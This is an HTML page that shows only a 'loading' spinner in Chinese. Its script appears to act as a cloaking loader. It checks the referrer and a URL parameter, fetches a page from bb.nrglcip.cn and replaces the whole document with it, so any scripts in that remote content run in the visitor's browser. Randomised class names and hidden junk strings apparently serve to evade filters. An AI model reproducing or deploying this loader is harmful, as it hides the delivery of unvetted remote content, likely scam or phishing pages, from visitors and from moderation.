<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .eo5bqOXhZ7 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .eo5bqOXhZ7 .NMlHHQeX {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .eo5bqOXhZ7 .content {
            line-height: 50px;
            text-align: center
        }

        .eo5bqOXhZ7 .img {
            width: 100%
        }

        .eo5bqOXhZ7 .EwQfoOzu3gH {
            text-align: center
        }

        .eo5bqOXhZ7 .EwQfoOzu3gH span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .eo5bqOXhZ7 .EwQfoOzu3gH span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .eo5bqOXhZ7 .EwQfoOzu3gH span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .eo5bqOXhZ7 .EwQfoOzu3gH span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .eo5bqOXhZ7 .EwQfoOzu3gH span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .eo5bqOXhZ7 .EwQfoOzu3gH span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .eo5bqOXhZ7 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function CvTCNq7g9n(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var u4Ix6 = CvTCNq7g9n('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ u4Ix6 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ u4Ix6 +".html?a=share";
		}
		
        h5hSRySl=url+"#"+new Date().getTime();
        h5hSRySl && function() {
            $.get(h5hSRySl, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >BGbFqU2kFWGO</li>
<h1 style='display:none' >tLS9kLonRDwLbc4yYRcWKWCDRKIdW9BXTgm2InjvGTbD9VukkVcvAAfy</h1>
<p  style='display:none'>F3z3XJ66widfXJ0Q8uEN9mkxJHAd4m7CFQl5dm7KDvQuuEtGMTcvyqztHShSlvja</p><div class="eo5bqOXhZ7">
    <div class="NMlHHQeX">
        <div class="EwQfoOzu3gH">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >TFbzw76i2rog0DkPX9uyr9Kz</ul>
<img  src='' style='display:none'>
<li style='display:none' >uZQQsXR89lK8mn6zZcCdDHI1rVklkKL8sLU3kY7SEPskYoJsj98ZdndaUvzfQYa5SUPdQMFuuEvVE99x7u3UKFgMCr</li></body>
</html>